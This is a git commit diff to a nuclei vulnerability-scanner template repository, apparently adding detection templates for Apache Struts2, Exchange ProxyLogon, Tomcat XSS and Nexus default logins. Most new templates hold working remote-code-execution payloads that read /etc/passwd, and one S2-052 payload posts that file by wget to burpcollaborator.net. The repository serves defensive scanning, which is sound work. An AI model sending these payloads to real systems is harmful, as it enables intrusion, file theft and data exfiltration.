commit
bbf5bf4b5a
|
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||||
| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 |
|
| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 |
|
||||||
| exposures | 60 | technologies | 50 | misconfiguration | 50 |
|
| exposures | 60 | technologies | 50 | misconfiguration | 51 |
|
||||||
| workflows | 23 | miscellaneous | 16 | default-logins | 17 |
|
| workflows | 23 | miscellaneous | 16 | default-logins | 18 |
|
||||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||||
| helpers | 2 | takeovers | 1 | - | - |
|
| helpers | 2 | takeovers | 1 | - | - |
|
||||||
|
|
||||||
**69 directories, 672 files**.
|
**72 directories, 687 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2007-4556
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Struts2 S2-001 RCE
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
reference: https://www.guildhab.top/?p=2326
|
||||||
|
tags: cve,cve2007,apache,rce,struts
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/login.action"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
body: |
|
||||||
|
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: CVE-2012-0392
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Struts2 S2-008 RCE
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
reference: https://blog.csdn.net/weixin_43416469/article/details/113850545
|
||||||
|
tags: cve, cve2012,apache,rce,struts
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,28 @@
|
||||||
|
id: CVE-2013-1965
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Struts2 S2-012 RCE
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965
|
||||||
|
tags: cve,cve2013,apache,rce,struts
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/user.action"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
body: |
|
||||||
|
name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: exploitation & @dwisiswant0
|
author: exploitation & @dwisiswant0
|
||||||
severity: critical
|
severity: critical
|
||||||
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
||||||
tags: cve,cve2013,rce
|
tags: cve,cve2013,rce,struts,apache
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- payloads:
|
- payloads:
|
||||||
|
|
|
@ -1,11 +1,11 @@
|
||||||
id: CVE-2016-3081
|
id: CVE-2016-3081
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: S2-032 Struts RCE
|
name: Apache S2-032 Struts RCE
|
||||||
author: dhiyaneshDK
|
author: dhiyaneshDK
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://cwiki.apache.org/confluence/display/WW/S2-032
|
reference: https://cwiki.apache.org/confluence/display/WW/S2-032
|
||||||
tags: cve,cve2016,struts,rce
|
tags: cve,cve2016,struts,rce,apache
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: CVE-2017-12611
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Struts2 S2-053 RCE
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12611
|
||||||
|
tags: cve,cve2017,apache,rce,struts
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -1,10 +1,10 @@
|
||||||
id: CVE-2017-5638
|
id: CVE-2017-5638
|
||||||
info:
|
info:
|
||||||
author: "Random Robbie"
|
author: Random Robbie
|
||||||
name: "Struts2 RCE "
|
name: Apache Struts2 RCE
|
||||||
severity: critical
|
severity: critical
|
||||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||||
tags: cve,cve2017,struts,rce
|
tags: cve,cve2017,struts,rce,apache
|
||||||
|
|
||||||
# This template supports the detection part only.
|
# This template supports the detection part only.
|
||||||
# Do not test any website without permission
|
# Do not test any website without permission
|
||||||
|
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: CVE-2017-9791
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Struts2 S2-053 RCE
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9791
|
||||||
|
tags: cve, cve2017,apache,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/integration/saveGangster.action"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
body: |
|
||||||
|
name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Content-Type: text/html"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,87 @@
|
||||||
|
id: CVE-2017-9805
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Struts2 S2-052 RCE
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805
|
||||||
|
tags: cve,cve2017,apache,rce,struts
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/struts2-rest-showcase/orders/3"
|
||||||
|
- "{{BaseURL}}/orders/3"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/xml
|
||||||
|
body: |
|
||||||
|
<map>
|
||||||
|
<entry>
|
||||||
|
<jdk.nashorn.internal.objects.NativeString>
|
||||||
|
<flags>0</flags>
|
||||||
|
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
|
||||||
|
<dataHandler>
|
||||||
|
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
|
||||||
|
<is class="javax.crypto.CipherInputStream">
|
||||||
|
<cipher class="javax.crypto.NullCipher">
|
||||||
|
<initialized>false</initialized>
|
||||||
|
<opmode>0</opmode>
|
||||||
|
<serviceIterator class="javax.imageio.spi.FilterIterator">
|
||||||
|
<iter class="javax.imageio.spi.FilterIterator">
|
||||||
|
<iter class="java.util.Collections$EmptyIterator"/>
|
||||||
|
<next class="java.lang.ProcessBuilder">
|
||||||
|
<command>
|
||||||
|
<string>wget</string>
|
||||||
|
<string>--post-file</string>
|
||||||
|
<string>/etc/passwd</string>
|
||||||
|
<string>burpcollaborator.net</string>
|
||||||
|
</command>
|
||||||
|
<redirectErrorStream>false</redirectErrorStream>
|
||||||
|
</next>
|
||||||
|
</iter>
|
||||||
|
<filter class="javax.imageio.ImageIO$ContainsFilter">
|
||||||
|
<method>
|
||||||
|
<class>java.lang.ProcessBuilder</class>
|
||||||
|
<name>start</name>
|
||||||
|
<parameter-types/>
|
||||||
|
</method>
|
||||||
|
<name>asdasd</name>
|
||||||
|
</filter>
|
||||||
|
<next class="string">asdasd</next>
|
||||||
|
</serviceIterator>
|
||||||
|
<lock/>
|
||||||
|
</cipher>
|
||||||
|
<input class="java.lang.ProcessBuilder$NullInputStream"/>
|
||||||
|
<ibuffer></ibuffer>
|
||||||
|
<done>false</done>
|
||||||
|
<ostart>0</ostart>
|
||||||
|
<ofinish>0</ofinish>
|
||||||
|
<closed>false</closed>
|
||||||
|
</is>
|
||||||
|
<consumed>false</consumed>
|
||||||
|
</dataSource>
|
||||||
|
<transferFlavors/>
|
||||||
|
</dataHandler>
|
||||||
|
<dataLen>0</dataLen>
|
||||||
|
</value>
|
||||||
|
</jdk.nashorn.internal.objects.NativeString>
|
||||||
|
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
|
||||||
|
</entry>
|
||||||
|
<entry>
|
||||||
|
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||||
|
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||||
|
</entry>
|
||||||
|
</map>
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Debugging information"
|
||||||
|
- "com.thoughtworks.xstream.converters.collections.MapConverter"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: CVE-2018-11776
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Struts2 S2-057 RCE
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
reference: https://github.com/jas502n/St2-057
|
||||||
|
tags: cve,cve2018,apache,rce,struts2
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2019-0221
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Tomcat XSS
|
||||||
|
author: pikpikcu
|
||||||
|
severity: low
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-0221
|
||||||
|
description: |
|
||||||
|
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
|
||||||
|
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
|
||||||
|
therefore, vulnerable to XSS. SSI is disabled by default.
|
||||||
|
The printenv command is intended for debugging and is unlikely to be present in a production website.
|
||||||
|
tags: cve,cve2019,apache,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert('xss')</script>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -6,9 +6,7 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
|
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
|
||||||
tags: cve,cve2020,zoho,traversal
|
tags: cve,cve2020,zoho,traversal
|
||||||
|
reference: https://github.com/BeetleChunks/CVE-2020-12116
|
||||||
# References:
|
|
||||||
# - https://github.com/BeetleChunks/CVE-2020-12116
|
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -1,27 +0,0 @@
|
||||||
id: CVE-2020-14815
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Oracle Business Intelligence XSS
|
|
||||||
author: pikpikcu
|
|
||||||
severity: medium
|
|
||||||
reference: https://www.oracle.com/security-alerts/cpuoct2020.html
|
|
||||||
tags: cve,cve2020,oracle,xss
|
|
||||||
source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E"
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- "X-Oracle-Dms-Ecid:"
|
|
||||||
- "X-Oracle-Dms-Rid:"
|
|
||||||
- "Set-Cookie:"
|
|
||||||
part: header
|
|
||||||
condition: and
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
|
reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
|
||||||
tags: cve,cve2020,apache,rce
|
tags: cve,cve2020,apache,rce,struts
|
||||||
|
|
||||||
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
|
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
|
||||||
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
|
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
|
||||||
|
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2021-26855
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Exchange Server SSRF Vulnerability
|
||||||
|
author: madrobot
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||||
|
tags: cve,cve2021,ssrf,rce,exchange
|
||||||
|
reference: |
|
||||||
|
- https://proxylogon.com/#timeline
|
||||||
|
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||||
|
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
|
||||||
|
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /owa/auth/x.js HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
|
||||||
|
Accept-Language: en
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Burp Collaborator Server"
|
||||||
|
part: body
|
|
@ -24,7 +24,7 @@ requests:
|
||||||
|
|
||||||
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
||||||
Content-Disposition: form-data; name="file"; filename="poc.txt"
|
Content-Disposition: form-data; name="file"; filename="poc.txt"
|
||||||
Content-Type: imnage/png
|
Content-Type: image/png
|
||||||
|
|
||||||
POC_TEST
|
POC_TEST
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: nexus-default-password
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Nexus Default Password
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
tags: nexus,dlogin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /service/rapture/session HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Length: 43
|
||||||
|
X-Nexus-UI: true
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 204
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Server: Nexus"
|
||||||
|
- "NXSESSIONID"
|
||||||
|
part: header
|
||||||
|
condition: and
|
|
@ -10,6 +10,7 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/.hg/hgrc"
|
- "{{BaseURL}}/.hg/hgrc"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
|
@ -19,4 +20,4 @@ requests:
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -2,7 +2,7 @@ id: phpinfo-files
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: phpinfo Disclosure
|
name: phpinfo Disclosure
|
||||||
author: pd-team & daffainfo
|
author: pd-team & daffainfo & meme-lord
|
||||||
severity: low
|
severity: low
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -25,9 +25,22 @@ requests:
|
||||||
- "{{BaseURL}}/infos.php"
|
- "{{BaseURL}}/infos.php"
|
||||||
- "{{BaseURL}}/linusadmin-phpinfo.php"
|
- "{{BaseURL}}/linusadmin-phpinfo.php"
|
||||||
- "{{BaseURL}}/php-info.php"
|
- "{{BaseURL}}/php-info.php"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "PHP Extension"
|
- "PHP Extension"
|
||||||
- "PHP Version"
|
- "PHP Version"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '>PHP Version <\/td><td class="v">([0-9.]+)'
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Apache Struts setup in Debug-Mode
|
name: Apache Struts setup in Debug-Mode
|
||||||
author: pd-team
|
author: pd-team
|
||||||
severity: low
|
severity: low
|
||||||
tags: logs,struts
|
tags: logs,struts,apache
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: gitlab-snippets
|
||||||
|
info:
|
||||||
|
name: GitLab public snippets
|
||||||
|
author: pdteam
|
||||||
|
severity: info
|
||||||
|
reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/explore/snippets"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Snippets · Explore · GitLab</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -1,4 +1,4 @@
|
||||||
id: microsoft-echange-server-detect
|
id: microsoft-exchange-server-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Microsoft Exchange Server Detect
|
name: Microsoft Exchange Server Detect
|
||||||
|
|
Loading…
Reference in New Issue